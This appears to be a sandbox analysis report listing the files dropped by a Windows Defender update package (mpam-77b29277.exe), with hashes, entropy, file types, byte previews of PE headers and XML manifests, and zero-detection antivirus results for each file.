File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48520
Entropy (8bit):	6.2073261328907865
Encrypted:	false
SSDEEP:	768:0WfrO9dZBf9slBe+eRPKUjKHWPkKrdtBGgz:1ybZMrCKUjKulLBH
MD5:	1BF7CF2DBA97C71FF1876F0DE67421C3
SHA1:	48DFEC30B75138FCAF5DFFE16CB9822BA4CC4178
SHA-256:	B946398AB34EF5BF16DC3461D32261664760C0F86E8A281BCD90361A170E27FD
SHA-512:	11E1E1C339F9BFFC83919946ACFA6F3D5CC1C7494A21629332004E2445AAE919A0E014366DFDCE7764C934E1F7C2C0CABAAFF0179C8A145DBB0759BAE218F540
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......kM.W/,../,../,../,...,...^..*,...^..,,...^..=,...^..),...Y..$,...Y}..,...Y...,..Rich/,..........PE..d...9............."......d...4...........................................................`A.................................................q..<.......`....`...........!......@....8..p...........................@0..8............p..`............................text............ .................. ..h.rdata..0....0.......$..............@..H.data........P.......8..............@....pdata.......`.......<..............@..H.idata.......p.......@..............@..HPAGE...../.......0...H.............. ..`INIT.................x.............. ..bGFIDS...$...........................@..B.rsrc...`...........................@..B.reloc..............................@..B................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	164072
Entropy (8bit):	6.14800914066086
Encrypted:	false
SSDEEP:	3072:A1y1RnaePd+RhtbV0vgn8wNgaZp8kdiQfH4M4mD:3naePkRhtbV0vrwNgaZp8G7fYe
MD5:	26B890C2237E48DAF8B9B901EBE7A0C1
SHA1:	08976CF446255E9BB538B8540BBE0DD4BF3E8A65
SHA-256:	B1D793E12DBF2CE5197960454F0A5AE6C93703FA5BF2D7622EC0FDFBAC183211
SHA-512:	F580903A15E67888F714CA073D4B56C349131D2C03769092794656E538E0501CCAAC4B563311346B22AD8F81302FE2FBE22F4F6B1BD352BC4213EAED7F7F25D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.i. ... ... .......#... ..........'...............%...............!.......!...Rich ...........................PE..d...l:..........."..................X.....................................................A....................................................P....p...............`... ..............p...........................Pb..8............................................text...*O.......P.................. ..h.rdata...Y...`...\...T..............@..H.data...............................@....pdata..............................@..H.idata........... ..................@..HPAGE....!).......,.................. ..`INIT.....)...0...,.................. ..bGFIDS........`.......@..............@..B.rsrc........p.......D..............@..B.reloc...............L..............@..B................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	434424
Entropy (8bit):	6.350342003442293
Encrypted:	false
SSDEEP:	6144:EF/vuF3th9Gf4GYapoQm1RGpIk6IjKtGnpPVzcZYac3UA2dwcSogCYog:EYFdhQgGYNPR8Iv1gpP+2oG
MD5:	B6C6FFC05B52D2F8A433DD12C3A11D30
SHA1:	F221740A99726722E5F5DF8CC3A0182436060A46
SHA-256:	666259E830F5EAC0707B2D957944B7468FA645271C60B8EA54E5130B8336D1F6
SHA-512:	1B0ABBB15A3018B584B0239C04A94E38FE433D382771BF8CFFAECC5B8776AC87DBC4278B4D2E0A341026F3B9FF43B84F604A52797D134E2C3881ADF03C9358F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Qm.0..kc..kc..kc..jc..kc.~jb..kc.~nb..kc.~ob..kc.~hb..kc.ycb-.kc.y.c..kc.yib..kcRich..kc................PE..d....5............"......L...4.......H..............................................=......A...................................................P....p.......`..4#....... ...........!..p...........................P...8............................................text............................... ..h.rdata..H}..........................@..H.data...d....P.......D..............@....pdata..4#...`...$...L..............@..H.idata...,.......0...p..............@..HPAGE.....-.......0.................. ..`INIT.....[.......\.................. ..bINIT.........P.......,..............@...GFIDS...<....`.......4..............@..B.rsrc........p.......8..............@..B.reloc...........0...P..............@..B................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	86264
Entropy (8bit):	6.087010539108971
Encrypted:	false
SSDEEP:	1536:xFbk8rfBGjiGUQiQ5Df0uEWWH1shZJ+Rb7NvmoHPNr:xFbprZGuzQnjR81shW5JvmCFr
MD5:	9C4361259D5F0D7A36A10BD28D000F90
SHA1:	F1CB41DB2356666AD123686B0AD52A2112D91474
SHA-256:	7445476DE9BAB0D9C975DBDF63BD928D7E3139DF3FC69463BF08897E3B087575
SHA-512:	55863A0B999439CD0C1747A81BD34991D81C631571797CC6F6335B60F1D054EB31951418DAF5587ADC43F65F16711482FBC82D0F0C9495CFBA834919FDBF9264
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U..U..U.....Q..U..,.....R.....E.....S....Z...%.T....T..RichU..................PE..d....%.........."..........\.......`....................................................`A................................................h...P....................0... ......H...X...p...............................8...............@............................text...*........................... ..h.rdata..p .......$..................@..H.data...(...........................@....pdata..............................@..H.idata..............................@..HPAGE....H ...0...$.................. ..`INIT.........`...................... ..bGFIDS........p......................@..B.rsrc...............................@..B.reloc...............$..............@..B........................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-AMFilter.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12624
Entropy (8bit):	5.259327730394375
Encrypted:	false
SSDEEP:	192:/5mm9AfGjUa1rIL+FUVin2F/OZDfYj5YbAxqTSSS6S8SzSySovK1ZVuB:/5mm9AfGtML+Fws2Fo7m5YcxHKrVo
MD5:	B6D65A86FC1999A62DA10EA3C4CAD3E4
SHA1:	E79E97C04D8540A2005D21021F7781676E705BCD
SHA-256:	05B2BFD40FB3A344C3AE178C420A7FEA9595815CB1CC07843078112F5F551EAF
SHA-512:	7F13B4930F9BF9ABCFD64E905DA4F0111B34197A533FB0162E43C4C80F39D135ADAA09C3E7AF3E95397BEF5D1D323E75721CEE150517CB13EBED3029C781BEC6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Drivers" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>... .. *********************************************************************************************************.. Driver files.. *********************************************************************************************************.. -->...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdFilter.sys" sourceName="WdFilter.sys" sourcePath=".\"></file>...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdBoot.sys" sourceName="WdBoot.sys" sou

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-NIS.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6173
Entropy (8bit):	5.373156847974759
Encrypted:	false
SSDEEP:	96:/3coK5HjFWr/96Hj+Uul2lewqo3nRtlUl3lflxSDwMKRbRhK18YaKMr4e:/mDFcujBuEgI3nzC1Z6V8f3
MD5:	5562965C32F03AE0DF8B9DEF950F8651
SHA1:	6E5AD734AB6A9F8B82B19024E21007AC2CAD2540
SHA-256:	EA64BE59286B67AE930729FA92B2B08DCE5C2EAEB70FEABE2320C47FB6DDAC6C
SHA-512:	F64D728AFE40800968D0B165019E775F62F2CCA40BFBB370F52F4BA8FCC2574F79D2C4AC41CCAE6E1CEC23082BA24B5E6C0A5531E6B336683BEEEDDA3CB81CDE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-NisSrvEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{102aab0a-9d9c-4887-a860-55de33b96595}" message="$(string.Microsoft-Antimalware-NIS.provider.name)" messageFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" name="Microsoft-Antimalware-NIS" resourceFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" symbol="Microsoft_Antimalware_NIS">......<tasks>.......<task eventGUID="{b33e041e-3a75-4f52-bf0e-c85d0963b7fb}" name="N

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-Protection.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3369
Entropy (8bit):	5.312049604455802
Encrypted:	false
SSDEEP:	96:/3poK58yFND08uf9zXzUzCzwat0kz9nHHzyPYjHMrje:/FbFHuf9DzUOVJ1HHePv2
MD5:	E4AD891E7B62475FCA109C0DF4DEF16E
SHA1:	B7DC3C04C67D7903E04B0EBF2AB7840AAA717EE0
SHA-256:	DF9AD93CDB61587A35FCDCE996955A64413439A474D85C86133A9E9C185D1966
SHA-512:	0849CB6F3DAA6C80B94F770E29BD389B67D31E089595B22BFAF1D6F25C6E847DA4DCBFF135F6D96E30597991FF6C8CA8EB5306C4E8D1B334016220058B2969E1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpClientEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{e4b70372-261f-4c54-8fa6-a5a7914d73da}" message="$(string.Microsoft-Antimalware-Protection.provider.name)" messageFileName="%programfiles%\Windows Defender\MpClient.dll" name="Microsoft-Antimalware-Protection" resourceFileName="%programfiles%\Windows Defender\MpClient.dll" symbol="Microsoft_Antimalware_Protection">......<tasks>.......<task eventGUID="{7db81ddd-d2be-41bd-

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-RTP.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12885
Entropy (8bit):	5.3652290431980765
Encrypted:	false
SSDEEP:	192:/ozFIItP1HvYoPp5z7YlAZSJwyygPJ2HBfEj:/QFIwP1PYoh5WAZSJwsJ2NC
MD5:	35AC30A8637BC0EB2F7902B8C69BF904
SHA1:	DB4C458A6007F444AECF8F4C49E481CC9935B22C
SHA-256:	FE761134076253DC11CF8C154CA43E762C61C28D0A817E76351FFEF32CCF59C0
SHA-512:	E41E522BF542D3B662D741E04523D1140C66585B64E811F6CD27C74466156F2FB728890C73579D4CFAD0BF8758D4F699A79C5B0B4B98479D60D386ACC26A8C49
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpRtpEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{8e92deef-5e17-413b-b927-59b2f06a3cfc}" message="$(string.Microsoft-Antimalware-RTP.provider.name)" messageFileName="%programfiles%\Windows Defender\MpRtp.dll" name="Microsoft-Antimalware-RTP" resourceFileName="%programfiles%\Windows Defender\MpRtp.dll" symbol="Microsoft_Antimalware_RTP">......<maps>.......<valueMap name="DlpOperationType">........<map message="$(string.Ope

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-Service.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	31904
Entropy (8bit):	5.2624632476710405
Encrypted:	false
SSDEEP:	384:/VFriW4cboWcauSi6fZeeCifUhwqh+46AJJCZvsp33icjEtFBR2EaXU1Hgb1RVxq:tFriHcblBLuJ1ycgtR6XNxB4
MD5:	B003B1DFFD9221745ED31E2979B28574
SHA1:	FBCEB9767657E596CEA5E29EBDA57207F5B08A5D
SHA-256:	5AE7493F638252D49F18B084D7CEA4E88D3AF6B1170C8C16EABF5C6AE849E3C9
SHA-512:	B731F60AC20548A54C465BFC3B20334946A384895C8AA4DF4C1DA969FB71F4B7C1BEC50044C4C5A9555B68B68C8A96EC45AE78FC5EBCD406102AE144A737FF02
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpSvcEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:ms="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{751ef305-6c6e-4fed-b847-02ef79d26aef}" message="$(string.Microsoft-Antimalware-Service.provider.name)" messageFileName="%programfiles%\Windows Defender\MpSvc.dll" name="Microsoft-Antimalware-Service" resourceFileName="%programfiles%\Windows Defender\MpSvc.dll" symbol="Microsoft_Antimalware_Service">......

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Windows-Windows Defender.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	149152
Entropy (8bit):	5.478121035794876
Encrypted:	false
SSDEEP:	1536:5oQofFA+1KSYfSN8bvc0/E/EvJ4rXVEc+ICO+PV5FqGc9HCOKK1HVX:SBfErIHKK1HVX
MD5:	36F8A68EECFB5B89C4C571F6A63E3ECA
SHA1:	242DC76813FE0BE2E676D37538FD887292803E68
SHA-256:	4D76246642181E38F87B623AF82BF7454050D05775F546506CFACA1608BE9633
SHA-512:	C483FCE988F96156FAAACA093F1CE948B0CC42C006012F6F29308F4ED09D295951F59C79A547341578616E58561CAF858135881AF305B3166E1D4474B48D35C8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Events" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<dependency discoverable="false" optional="false" resourceType="Resources">....<dependentAssembly>.....<assemblyIdentity buildType="release" language="" name="Windows-Defender-Events.Resources" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384"></assemblyIdentity>....</dependentAssembly>...</dependency>... .. ********************************************************************************************************.. BEGIN FILES SECTION .. *********************************************************************************************************.. --

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAsDesc.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	209144
Entropy (8bit):	5.205036912846813
Encrypted:	false
SSDEEP:	6144:PmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJL:tr
MD5:	A27F0ABF90F3B468C6F15CDAFBBC3312
SHA1:	D75B9FD570E9650F583F15F0F0F37EB2CBC39EC4
SHA-256:	503DF4EF842D6621139D4A15D68955E4926C0C6B5CCCEF60323290A6FC08343F
SHA-512:	9716144577A19591E12BB10732FF135D00928D1C5951AB220057A4A00D42B74E8980825D6DD60A8486EE1EC75CBAEA7C5525D4F4E600F5F869BEABA53C7D5FE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d....z..........." ......................................................................`A......................................................... ................... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAzSubmit.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1409272
Entropy (8bit):	6.2399898718653075
Encrypted:	false
SSDEEP:	24576:5k4dJL+FQJApr2tz1+lC2zxw6y2os4OXB7vcHFzqh7OcI:5k4dJK+Jur2tz1+lC2VO2osDy
MD5:	C10F256B7606EE5B1BED880020F68912
SHA1:	76B51FDD50A3EEBD4B55D97E3C9A8B8C79EDF978
SHA-256:	C649EC99F87F684D22157755E5F8E0AF7C1EFD54853493965A673A3F0FFB4AC6
SHA-512:	A5A9C4190A831D1FE2EADD1AB9FE97A0BE39FE4EE97A0F223D0AC42E80C72FA2B77AA0D2F929A3B2F10E7AB4E850BC7DF1DE420CAFD7289C08C763D951D997CB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........`J.v3J.v3J.v3..u2K.v3..w2Y.v3J.w3u.v3..u2Y.v3..r2a.v3..s2..v3..3H.v3..v2K.v3...2.v3..3K.v3..t2K.v3RichJ.v3................PE..d................" .....P... .................f....................................r4....`A........................................`b.......c.......@.......@.......`... ...P...,..\|k..p.......................(.......8............................................text...HO.......P.................. ..`.rdata..$....`... ...`..............@..@.data...8...........................@....pdata.......@....... ..............@..@.rsrc........@....... ..............@..@.reloc...,...P...0...0..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpClient.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1151224
Entropy (8bit):	6.1798062394748685
Encrypted:	false
SSDEEP:	24576:MLG0IKv+HzAmqQBrTPQWNRIyQhZBcfy0RkgJ:cGFu+HzAmqEQWNRIypfy0J
MD5:	FD7D2158F21085FF8E8C46829839708E
SHA1:	1749008645208E9769DD68D36124113E71923F6D
SHA-256:	DE50D8BB61B7F0BB423E4A50A6775192C4809F63C18BE9426C4AC2E127BB9DA9
SHA-512:	03707AEAF1FED4C2BDC2CA4167498C5F7C57153A47F386D9C6A7A0DF75CD5B3C54D01A42AB56B6FDBF9A10E26213A6540FDE19F5036DC8E659500F19D728AFF0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................V..........................................?.............i.....V.......V........?......V.k.....V.......Rich............PE..d...f............." .................g.........[....................................3.....`A................................................8...T....@...............p... ...P...!......p...................(o..(.......8...........Po...............................text............................... ..`.rdata...R.......`..................@..@.data...............................@....pdata..............................@..@.didat.......0....... ..............@....rsrc........@.......0..............@..@.reloc...!...P...0...@..............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	884544
Entropy (8bit):	6.103389158363899
Encrypted:	false
SSDEEP:	12288:b1SQ6UqCplyaRffknhoV55jmvuN7Wk0mCBRUe:b+UbnkhoVLmvuNqBGe
MD5:	D50CBCB0B8B3282CD169E0032361D418
SHA1:	948E0431282837D2E654BFD805461967B99E63B4
SHA-256:	F7B6EB6E4D8E04C7243AB0AB73CEC6E20E980F07E03267ED4B0CA69CF9CDAB3D
SHA-512:	13184B5DFD5E82C44F1451AD426B7FB8ACE63923679D4210C3B2CACE6691DBACD113E9D55FFB041D1C79C46A80C128EE5D2A97E874487A938DBCF08C03A1C3EC
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`...`...`..z....`..z....`..&....`..&....`....l..`..&....`..&....`...`...b..z...I`......`..z....`..z....`..Rich.`..........................PE..d................"..........0.................@.............................P.......j............... ..............................................p..........,O...@..@?...@..........p....................J..(....(..8...........@J......8........................text...[........................... ..`.rdata..>.... ....... ..............@..@.data....M.......@..................@....pdata..,O.......P..................@..@.didat.......`.......P..............@....rsrc........p.......`..............@..@.reloc.......@.......0..............@..B........................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCommu.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	352504
Entropy (8bit):	6.026593673622959
Encrypted:	false
SSDEEP:	6144:yOoa9kPfLM055gj5qDj8qdzRf8IGRx7Ur9opJtwEKLoi7GG75li:yXHjgjELzRf4q9oduLR77i
MD5:	98DE76E6BD6919C81785F34F3E4E4025
SHA1:	9E1BF8C617D7D629623D16DE29889659F4623066
SHA-256:	A5D1C85E15E4454D0CF4E613107F688B540A046659F1DDECA859B395335BD50D
SHA-512:	5F233E59E8C4BB320C5BCD42505300EFEAA519FE35B1877A7213CB471162A1BB613C027FBDB1126FB6E747A704CDE4D799FC4421808819650126D4A9EB282557
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I...I...I......K......H.......E.......G.......A...@.o.X...I...........e......H.............H......H...RichI...................PE..d....5.}.........." ................`..........f.............................P......n.....`A........................................................0...........,...@... ...@..(...l...p...................H...(.......8...........p...............................text...5........................... ..`.rdata........... ..................@..@.data....#....... ..................@....pdata...,.......0..................@..@.didat..X.... ......................@....rsrc........0....... ..............@..@.reloc..(....@.......0..............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCopyAccelerator.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165576
Entropy (8bit):	5.403399700794782
Encrypted:	false
SSDEEP:	3072:Obc/k/710XdiWNGKTeoKeMK9OQWExQc5W:OIM/72IWb9n9OQWEno
MD5:	B613F7C352DB0471338A01FA7CF94521
SHA1:	04618A6DD7100D957E6B190F70C263F1FF775CAB
SHA-256:	71ABD7C64E51AF9A750A31BAC218F9E6781C913869D97AA4024C2456E101CB20
SHA-512:	0D538585A972252EF6FF99C3ABB8F682201EE33A0FDFADB5BDCBEEE65E38D2C64BF8893B1691276ABF8F44303309BECF89AE0E74C3248609FB93FA22A6CD8F5D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................F......F.......B....F......F..................................Rich....................PE..d.....J..........."..........P................@.............................`....................... .......................................Z..................<....`...&...P..4....8..p.......................(.......8...........8................................text............................... ..`.rdata...].......`..................@..@.data........p.......p..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..4....P.......P..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	164088
Entropy (8bit):	5.889246599238573
Encrypted:	false
SSDEEP:	3072:LhAcjxmGnxakZmOpjZrppk4sGFO5SVyT+/t5xRbOz8kKbc/3u:LKc4GnQeVaGs5ZgbRk6cG
MD5:	6694C427D876FEEC65126E7734886E88
SHA1:	F6F08ADEEA556B241E4010F538DA7E6C32047628
SHA-256:	A76E653BA8D251379133B748B685C08672A69D1CF95493549E563CFAD8A8D7A5
SHA-512:	620A52BF3D503B82D82799C48A23CF4AA8BD7E399C343192EDB52E28FA6815976C90621D1B2E5EB841B0711F5F4191BFB141529CC341EAA215A8905A65FA0010
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:Q..~0t.~0t.~0t..Ew..0t..Bu.n0t..Bp.r0t..Bw.y0t.wH.q0t.~0u.M1t..Bq.W0t..Et..0t..E}.60t..E...0t..Ev..0t.Rich~0t.................PE..d.....x..........." .........................................................p............`A.........................................................P.......0.......`... ...`......@...p.......................(...`...8............................................text....v.......................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ... ..............@..@.rsrc........P.......@..............@..@.reloc.......`.......P..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetoursCopyAccelerator.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	102632
Entropy (8bit):	5.416424506292462
Encrypted:	false
SSDEEP:	1536:dnC8TM3nUZtTOwts7XxhrTNCfDgFvFJ2m6K2mPegHPxG:ZTM3UZtTOwW7XTNCfDGdBx2mPeqk
MD5:	50E2C916D6B2E5CDCED1BF18BEF5B9E6
SHA1:	523DA8427550B397352D0C7D9770BBE57E31C5CD
SHA-256:	C880E519887E5AFD35612BDAF4F987D79ED294050A4D291B54B18F7F3C80A89D
SHA-512:	C95F1D480DC1EF5587C9B9CE89F9C58550B2CD7E1E2389DE3A02DFBF541C9BBF66AFEC724767B574C81236FF0F5AE9C25D99702BA76FFC214290536C32BD6F3D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
